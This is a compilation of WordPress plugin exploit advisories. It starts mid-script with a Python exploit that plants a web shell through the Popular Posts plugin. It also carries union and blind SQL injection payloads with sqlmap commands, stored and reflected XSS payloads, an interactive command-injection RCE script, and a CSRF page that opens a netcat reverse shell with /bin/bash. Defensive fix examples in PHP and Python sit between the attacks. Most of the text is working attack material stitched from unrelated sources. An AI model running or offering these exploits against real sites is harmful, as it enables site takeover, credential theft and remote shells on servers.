'action': 'wpp_clear_thumbnail',
'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
print(f'[+] Images cache cleared. ')
'''
Get the new post ID and Nonce
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php'
new_post_page = session.get(new_post_url).text
search_string = 'name="_ajax_nonce-add-meta" value="'
search_string_end = '" />'
new_post_page = new_post_page[new_post_page.find(search_string)+35:]
ajax_nonce = new_post_page[:new_post_page.find(search_string_end)]
search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "'
search_string_end = '" );'
new_post_page = new_post_page[new_post_page.find(search_string)+66:]
wp_nonce = new_post_page[:new_post_page.find(search_string_end)]
search_string = '},"post":{"id":'
search_string_end = ','
new_post_page = new_post_page[new_post_page.find(search_string)+15:]
post_ID = new_post_page[:new_post_page.find(search_string_end)]
if post_ID and wp_nonce and ajax_nonce:
    print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].')
else:
    if not post_ID: print('[-] Error while gathering post_ID !')
    elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !')
    elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !')
    exit()
'''
Publish a new post
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user'
data = {"id":post_ID,"title":"I'm the one who knocks","content":"<!-- wp:paragraph -->\n<p>upgrade your plugins</p>\n<!-- /wp:paragraph -->","status":"publish"}
header['X-WP-Nonce'] = wp_nonce
header['Content-Type'] = 'application/json'
header['X-HTTP-Method-Override'] = 'PUT'
new_post_page = session.post(new_post_url, headers=header, json=data).text
if new_post_page.find('"status":"publish"'):
    print(f'[+] New post named [I\'m the one who knocks] published correctly!')
else:
    print('[-] Error while publishing the new post !')
    exit()
'''
Add the Custom Filed
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
header.pop('X-WP-Nonce')
header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
header.pop('X-HTTP-Method-Override')
header['Accept']='*/*'
header['X-Requested-With'] = 'XMLHttpRequest'
body = {
'_ajax_nonce': 0,
'action': 'add-meta',
'metakeyselect': 'wpp_thumbnail',
'metakeyinput': "",
'metavalue' : PHP_URL,
'_ajax_nonce-add-meta': ajax_nonce,
'post_id' : post_ID
}
new_post_page = session.post(new_post_url, headers=header, data=body).text
if new_post_page.find("<tr id='meta-") > 0:
    print(f'[+] Added a new Custom Field with the uploaded web shell.')
else:
    print('[-] Error while adding the custom field !')
    print(new_post_page)
    exit()
'''
Give it some views to pop it up in the recent posts
'''
print(f'[+] Giving the new post some views (10) [ ', end="")
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php?page_id=' + post_ID
redirect_url = session.get(new_post_url).url
new_post_plugin_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wordpress-popular-posts/v1/popular-posts'
data = {
'_wpnonce': wp_nonce,
'wpp_id': post_ID,
'sampling': 0,
'sampling_rate': 100
}
for progress in range(10):
    session.get(redirect_url)
    res = session.post(new_post_plugin_url, headers=header, data=data)
    print ('=', end='')
print(' ] '+json.loads(res.text)['results'])
print('[+] Exploit done !')
print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name)
print('')
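The script above relies on the plugin fetching whatever URL sits in the wpp_thumbnail custom field and writing the result to wp-content/uploads under the remote filename, so exploit.gif.php lands on disk as a .php file. The sideload routine below is an added example (not Wordpress Popular Posts code; function names and the storage directory are assumed, and it requires WordPress) that trusts neither the URL nor the remote name: the type is taken from the bytes, the filename is generated, and the image is re-encoded through the same GD/Imagick editor the plugin needs anyway.

```php
<?php
/**
 * Added example, not Wordpress Popular Posts code. Function names and the
 * storage directory are assumed. Requires WordPress (download_url,
 * wp_get_image_mime, wp_get_image_editor).
 */

function example_sideload_thumbnail( $post_id, $url, $width = 100, $height = 100 ) {
    require_once ABSPATH . 'wp-admin/includes/file.php';

    // Only http(s) with a host; rejects data:, file:, php:// and similar.
    // wp_http_validate_url() additionally refuses loopback/private targets.
    $url = esc_url_raw( trim( (string) $url ), array( 'http', 'https' ) );
    if ( '' === $url || ! wp_http_validate_url( $url ) ) {
        return new WP_Error( 'bad_url', 'thumbnail must be a public http(s) URL' );
    }

    // Fetch into a temp file with a short timeout.
    $tmp = download_url( $url, 15 );
    if ( is_wp_error( $tmp ) ) {
        return $tmp;
    }

    // Allow-list keyed by the MIME type read from the file's magic bytes,
    // never from the URL's extension.
    $ext_for = array(
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
        'image/webp' => 'webp',
    );
    $mime = wp_get_image_mime( $tmp );
    if ( false === $mime || ! isset( $ext_for[ $mime ] ) ) {
        @unlink( $tmp );
        return new WP_Error( 'not_image', 'remote file is not an allowed image type' );
    }

    // The destination name is generated here: post id, a hash of the URL and
    // the extension implied by the detected type. The remote name
    // (exploit.gif.php) never reaches the filesystem, so the webserver will
    // serve the result as an image rather than hand it to PHP.
    $upload = wp_upload_dir();
    $dir    = trailingslashit( $upload['basedir'] ) . 'example-thumbs';
    wp_mkdir_p( $dir );
    $dest = sprintf( '%s/%d_%s.%s', $dir, (int) $post_id, substr( md5( $url ), 0, 12 ), $ext_for[ $mime ] );

    // Re-encode through the image editor. A file whose first bytes merely look
    // like a GIF header fails to decode; a real image is rewritten pixel by
    // pixel, which discards anything appended after the image data.
    $editor = wp_get_image_editor( $tmp );
    if ( is_wp_error( $editor ) ) {
        @unlink( $tmp );
        return $editor;
    }
    $resized = $editor->resize( $width, $height, true );
    if ( is_wp_error( $resized ) ) {
        @unlink( $tmp );
        return $resized;
    }
    $saved = $editor->save( $dest, $mime );
    @unlink( $tmp );
    if ( is_wp_error( $saved ) ) {
        return $saved;
    }
    return $saved['path'];
}

// The custom field is only a URL candidate; it is never used past this point
// without going through the checks above.
function example_thumbnail_for_post( $post_id ) {
    $candidate = get_post_meta( $post_id, 'wpp_thumbnail', true );
    return example_sideload_thumbnail( $post_id, $candidate );
}
```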
Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability
Author : WICS
Date : 7/12/2015
Software Link : https://wordpress.org/plugins/polls-widget/
Affected Version: 1.0.7 and below
Overview:
Poll widget is a WordPress plugin which provides a fancy polling layout to website users, who can vote according to the options provided in a specific poll.
This plugin has 2000+ active installations.
The vulnerability exists in the front_end.php file, in which the code does not filter user-supplied data on the parameter question_id:
line no. 36 $question_id=$_POST['question_id'];
....
....
line no. 94--> $answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A);
print_r(json_encode($answer, JSON_FORCE_OBJECT));
this script is vulnerable to union based sql injection with column count 2
POC
http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues
in post data, add this
question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5
Exploit Title: WordPress Polls plugin (1.2.4) SQL Injection vulnerability
Vulnerable version: <= 1.2.4
Download Link: https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip
Overview:
WordPress Polls plugin is a tool for creating polls and survey forms; polls can be placed in widgets, posts and pages. The plugin accepts the visitor's answer from the survey form, and during that step the HTTP POST parameter "question_id" goes into an SQL query without sanitization, which gives rise to an SQL injection vulnerability. The vulnerable code is in the "front_end/front_end.php" file.
POC
SQL Injection payload to enumerate tables and columns (poll_answer_securety is the plugin's form nonce; take the current value from the rendered poll form)
----------------------------------------------
http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
Post data
question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
Screenshot of the injected output: https://github.com/incredibleindishell/exploit-code-by-me/blob/master/WordPress%20Polls%20plugin-1.2.4-%20SQL%20Injection%20vulnerability/injected.png?raw=true
# Exploit Title: WordPress Plugin Poll, Survey, Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection
# Date: 09/06/2021
# Exploit Author: inspired - Toby Jackson
# Blog Post: https://in-spired.xyz/wpdevart-polls-blind-sql-injection/
# Vendor Homepage: https://wpdevart.com/wordpress-polls-plugin
# Software Link: https://en-gb.wordpress.org/plugins/polls-widget/
# Version: Tested on version 1.5.0 and 1.5.2 (Older versions may be affected)
# Tested on: WordPress
## I. Vulnerability
Blind SQL Injection
## II. Product Overview
The software allows users to quickly generate polls and voting system and displays the results in real time.
## III. Exploit
A vulnerability has been discovered in the wpdevart WordPress plugin "Poll, Survey, Questionnaire and Voting system", versions 1.5.0 and 1.5.2. It is possible to perform a blind SQL injection through the date_answers[] parameter when casting a vote, which can be used to dump the back-end database. On version 1.5.2 the request must also carry a spoofed client address, for example in an X-Forwarded-For header, because the plugin uses that address to decide whether the client has already voted.
## IV. Vulnerable Code
The vulnerable code resides in front_end.php, in the save_poll_in_databese() function. It reads $question_id and $current_user_ip, then takes the submitted answers straight from the date_answers POST parameter into $new_voted_array:
$new_voted_array=$_POST['date_answers'];
The array is then looped through and each $new_answer value is concatenated into the WHERE clause without sanitization or quoting:
if($new_voted_array)
foreach($new_voted_array as $new_answer) {
$wpdb->query('UPDATE '.$wpdb->prefix.'polls SET vote = vote+1 WHERE `question_id` = '.$question_id.' AND `answer_name` = '.$new_answer.'');
}
This code was fixed in version 1.5.1, but 1.5.1 and 1.5.2 remain vulnerable: when a client votes for the first time, the vote is recorded by a different statement with the same flaw. Because the plugin relies on user-controlled headers to decide whether a client has already voted, an attacker who sets an arbitrary X-Forwarded-For value on each request can keep voting as a "new" user and keep triggering the injection.
if ($new_voted_array)
foreach ($new_voted_array as $answer) {
$wpdb->query('UPDATE ' . $wpdb->prefix . 'polls SET vote = vote+1 WHERE `question_id` = ' . $question_id . ' AND `answer_name` = ' . $answer . '');
}
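The injection in the three polls advisories above is a numeric-context one: question_id and each date_answers[] value land in the query unquoted, so no quote character is needed and escaping functions would not help. The following is an added example, not plugin code, that reproduces both queries against an in-memory SQLite database: the table layout and rows are constructed, sqlite_master stands in for MySQL's information_schema.tables, and since SQLite has no sleep() the UPDATE demo uses a tautology instead of the time delay from the advisory's PoC. The hardened variants do what $wpdb->prepare() with a %d placeholder amounts to: coerce to an integer, then bind.

```python
"""Numeric-context SQL injection in the polls plugin, reproduced in SQLite.

Added example, not plugin code. The schema is constructed to resemble wp_polls,
sqlite_master stands in for MySQL's information_schema, and the two
"vulnerable" builders imitate the $wpdb calls quoted in the advisories: the
SELECT from front_end.php line 94 and the UPDATE loop from save_poll_in_databese().
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: two polls, three answers, one user row worth leaking.
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE wp_polls (question_id INTEGER, answer_name INTEGER, vote INTEGER);
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
        INSERT INTO wp_polls VALUES (1, 10, 3), (1, 11, 5), (2, 12, 0);
        INSERT INTO wp_users VALUES ('admin', '$P$B-constructed-hash');
        """
    )
    return con


def results_vulnerable(con: sqlite3.Connection, question_id: str) -> list:
    # question_id is concatenated unquoted, exactly like the plugin's get_results() call.
    sql = "SELECT answer_name, vote FROM wp_polls WHERE question_id=" + question_id
    return con.execute(sql).fetchall()


def results_safe(con: sqlite3.Connection, question_id: str) -> list:
    # Equivalent of $wpdb->prepare('... WHERE question_id = %d', $id):
    # coerce to an integer first (a payload raises ValueError), then bind it.
    qid = int(question_id)
    return con.execute(
        "SELECT answer_name, vote FROM wp_polls WHERE question_id=?", (qid,)
    ).fetchall()


def leak_tables_via_union(con: sqlite3.Connection) -> list:
    # The two-column UNION from the advisories: 1337 matches no poll, so only the
    # attacker-chosen rows come back. In MySQL the right-hand side would read
    # information_schema.tables WHERE table_schema=database().
    payload = "1337 union all select name, 2 from sqlite_master where type='table'"
    return [row[0] for row in results_vulnerable(con, payload)]


def vote_vulnerable(con: sqlite3.Connection, question_id: str, answers: list) -> None:
    # Mirrors the 1.5.x loop: each date_answers[] value lands unquoted in the WHERE.
    # In MySQL an answer of "sleep(10)" gives the time-based oracle from the PoC;
    # SQLite has no sleep(), so the demo uses a tautology that bumps every row.
    for answer in answers:
        con.execute(
            "UPDATE wp_polls SET vote = vote+1 WHERE question_id = "
            + question_id + " AND answer_name = " + answer
        )
    con.commit()


def vote_safe(con: sqlite3.Connection, question_id: str, answers: list) -> None:
    # Cast both values to int and bind them; "0 OR 1=1" never reaches SQL.
    qid = int(question_id)
    for answer in answers:
        con.execute(
            "UPDATE wp_polls SET vote = vote+1 WHERE question_id = ? AND answer_name = ?",
            (qid, int(answer)),
        )
    con.commit()


def total_votes(con: sqlite3.Connection) -> int:
    return con.execute("SELECT sum(vote) FROM wp_polls").fetchone()[0]


if __name__ == "__main__":
    con = make_db()
    print("leaked tables:", leak_tables_via_union(con))
    before = total_votes(con)
    vote_vulnerable(con, "1", ["0 OR 1=1"])
    print("votes before/after tautology:", before, total_votes(con))
    try:
        vote_safe(con, "1", ["0 OR 1=1"])
    except ValueError as exc:
        print("hardened version rejected payload:", exc)
```

The point of the hardened functions is that the fix is a type boundary, not a filter: once the value is an integer there is nothing left to inject, which is also why the 1.5.1 fix that only touched one of the two UPDATE statements left the other reachable.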
## V. Proof of Concept
A typical vote, intercepted with Burp, looks like the request below. Replacing the answer with sleep(10) makes the database pause for 10 seconds before the response comes back, which is the time-based oracle.
------
POST /blog/wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/blog/index.php/2021/06/09/research/
Cookie: wordpress_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3538f3f44a02304781e099f970dc762fd89e88378a46613cf636fcd28a9755d3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3d7d7b6485e1daa04da753dcc4e85a56150091301de3668ffe108e7829134f0d; wp-settings-time-1=1623238438
question_id=1&poll_answer_securety=5b29ac18fe&date_answers%5B0%5D=sleep(10)
------
From here the database can be dumped by saving the intercepted request and handing it to sqlmap. Replacing the answer value with * marks the injection point, so sqlmap tests that location first.
------
POST /blog/wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/blog/index.php/2021/06/09/research/
Cookie: wordpress_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3538f3f44a02304781e099f970dc762fd89e88378a46613cf636fcd28a9755d3; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_d23cdc2cc5dd18709e8feb86452d865b=inspired%7C1623345285%7C52E5QESQG5PIPUT2tixVHPIkdN8inwgNojy9hs0JvDS%7C3d7d7b6485e1daa04da753dcc4e85a56150091301de3668ffe108e7829134f0d; wp-settings-time-1=1623238438
question_id=1&poll_answer_securety=5b29ac18fe&date_answers%5B0%5D=*
------
Save this request to a file, request.txt, and run the tool.
------
sqlmap -r request.txt --dbms=mysql --dbs --level=5 --risk=3
[14:30:54] [INFO] testing MySQL
[14:30:54] [INFO] confirming MySQL
[14:30:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 8.0.0
[14:30:54] [INFO] fetching database names
[14:30:54] [INFO] fetching number of databases
[14:30:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:30:54] [INFO] retrieved: 2
[14:30:54] [INFO] resumed: information_schema
[14:30:54] [INFO] resumed: wordpress
available databases [2]:
[*] information_schema
[*] wordpress
------
------
sqlmap -r request.txt --dbms=mysql -D wordpress --tables --level=5 --risk=3
Database: wordpress
[19 tables]
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_democracy_a |
| wp_democracy_log |
| wp_democracy_q |
| wp_links |
| wp_options |
| wp_polls |
| wp_polls_question |
| wp_polls_templates |
| wp_polls_users |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
------
https://www.youtube.com/watch?v=Fj1zeXNxDYQ
In versions 1.5.1 and 1.5.2, this vulnerability only occurs on the first vote a user casts. Adding a random X-Forwarded-For header to the requests will allow for the attack to be repeated as described above.
This has been demonstrated in the following PoC.
https://www.youtube.com/watch?v=P1r7gk0DSaM
## VI. Impact
An attacker can dump the back-end database, including the password hashes in wp_users, and use the recovered credentials for further attacks. Depending on database privileges and server configuration (for example a database account allowed to write files under the web root), this can also lead to remote code execution on the server.
## VII. SYSTEMS AFFECTED
WordPress websites running the "Poll, Survey, Questionnaire and Voting system" plugin version 1.5.2 (older versions may also be affected).
## VIII. REMEDIATION
The vulnerability is fixed in version 1.5.3; update to that version or later.
## IX. DISCLOSURE TIMELINE
-------------------------
June 9, 2021 1: Vulnerability identified.
June 9, 2021 2: Informed developer of the vulnerability.
June 9, 2021 3: Vendor replied to discuss the vulnerability in more detail.
June 9, 2021 4: Sent vendor proof of concept and impacted code blocks.
June 10, 2021 1: Vendor emails to state the vulnerability has been fixed.
June 10, 2021 2: Confirmed initial fix, vendor happy to disclose the vulnerability.
June 10, 2021 3: Requested CVE Number.
June 19, 2021 1: WPScan contact to discuss vulnerability.
June 19, 2021 2: Confirmed fix is not valid when new user votes or edits headers.
June 19, 2021 3: Contacted vendor to request further fix.
June 22, 2021 1: Vendor confirms fix. Information made public.
source: https://www.securityfocus.com/bid/58421/info
The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
podPress 8.8.10.13 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//
source: https://www.securityfocus.com/bid/56661/info
The Plg Novana plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)
# Date: 22 March 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.32
# Proof Of Concept:
1. Click "Add a new playlist" and enter the XSS payload below into the "Name" or "Playlist ID" property.
# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns
# Vulnerable Properties name: name, playlist_id
# Payload: "><script>alert(document.cookie)</script>
# Request:
POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2
Host: erdemstar.local
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 178
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000
# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
# Date: 07.07.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
# Version: 20161228 and possibly prior
# Fixed version: 20180826
# CVE : CVE-2018-15877
"""
-------------------------
Usage:
┌──(root@kali)-[~/tools]
└─# python3 WordPress-Activity-Monitor-RCE.py
What's your target IP?
192.168.101.28
What's your username?
mark
What's your password?
password123
[*] Please wait...
[*] Perfect!
www-data@192.168.101.28 whoami
www-data
www-data@192.168.101.28 pwd
/var/www/html/wp-admin
www-data@192.168.101.28 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""
import requests
from bs4 import BeautifulSoup


def exploit(whoami, ip):
    while 1:
        cmd = input(whoami + "@" + ip + " ")
        url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
        # the lookup target is spliced into a shell command line, so "| cmd" runs cmd
        payload = "google.com.tr | " + cmd
        data = {'ip': payload, 'lookup': 'lookup'}
        x = requests.post(url, data=data, cookies=getCookie(ip))
        html_doc = x.text.split("<p>Output from dig: </p>")[1]
        soup = BeautifulSoup(html_doc, 'html.parser')
        print(soup.p.text)


def poc(ip):
    url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
    myobj = {'ip': 'google.fr | whoami', 'lookup': 'lookup'}
    x = requests.post(url, data=myobj, cookies=getCookie(ip))
    html_doc = x.text.split("<p>Output from dig: </p>")[1]
    soup = BeautifulSoup(html_doc, 'html.parser')
    print("[*] Perfect! ")
    exploit(soup.p.text, ip)


def getCookie(ip):
    url = 'http://' + ip + '/wp-login.php'
    # log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
    data = {'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1'}
    x = requests.post(url, data=data)
    cookies = {}
    cookie = str(x.headers["Set-Cookie"])
    for i in cookie.split():
        if i.find("wordpress") != -1 and i.find("=") != -1:
            cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1]) - 1]
    return cookies


ip = input("What's your target IP?\n")
username = input("What's your username?\n")
password = input("What's your password?\n")
print("[*] Please wait...")
poc(ip)
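Both Plainview exploits on this page work because the `ip` value is pasted into a shell command line, so `google.fr | whoami` becomes two commands (CWE-78). The following is an added example, not plugin code or the exploit author's code: it reproduces the vulnerable pattern with `echo` standing in for `dig`, so it runs offline with nothing but /bin/sh, and puts next to it the two-part fix a practitioner would apply: an allowlist check (IP literal or RFC 1123 host name) and passing the value as a single argv element so no shell parses it. The host-name grammar and the function names are this example's own.

```python
"""Shell command injection of the kind in activities_overview.php, and the fix.

Added example, not plugin code. The plugin runs a DNS lookup with the POSTed
`ip` value spliced into a shell command line; here `echo` stands in for `dig`
so the demonstration runs offline. Only lookup_vulnerable() needs a POSIX
shell; the validation itself is pure Python.
"""
import ipaddress
import re
import subprocess

# RFC 1123 host name: labels of 1-63 alphanumerics or hyphens, no leading or
# trailing hyphen, at most 253 characters in total. Nothing else is accepted.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def lookup_vulnerable(target: str) -> str:
    """String concatenation into a shell: 'google.fr | id' runs id."""
    completed = subprocess.run("echo " + target, shell=True, capture_output=True, text=True)
    return completed.stdout


def is_valid_lookup_target(target: str) -> bool:
    """Allowlist check: an IPv4/IPv6 literal or a syntactically valid host name."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def lookup_safe(target: str) -> str:
    """Validate first, then hand the value over as one argv element. No shell
    ever sees it, so metacharacters would be inert even without the check."""
    if not is_valid_lookup_target(target):
        raise ValueError(f"refusing lookup target {target!r}")
    completed = subprocess.run(["echo", target], capture_output=True, text=True)
    return completed.stdout


if __name__ == "__main__":
    print(lookup_vulnerable("google.fr | echo INJECTED"), end="")   # prints INJECTED
    print(lookup_safe("google.fr"), end="")                          # prints google.fr
    for probe in ("8.8.8.8", "google.com.tr", "google.fr | whoami", "a;b", "-x.com"):
        print(f"{probe!r}: {'accepted' if is_valid_lookup_target(probe) else 'rejected'}")
```

Note that the argv form alone already defeats the injection; the allowlist is there because a lookup tool may still interpret arguments starting with `-` or `@` in its own way, which is the next bug down.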
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with your IP and port to get a reverse shell
[+] Note: Many reflected XSS issues exist in this plugin and can be combined with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nv 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/47142/info
The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Placester 0.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
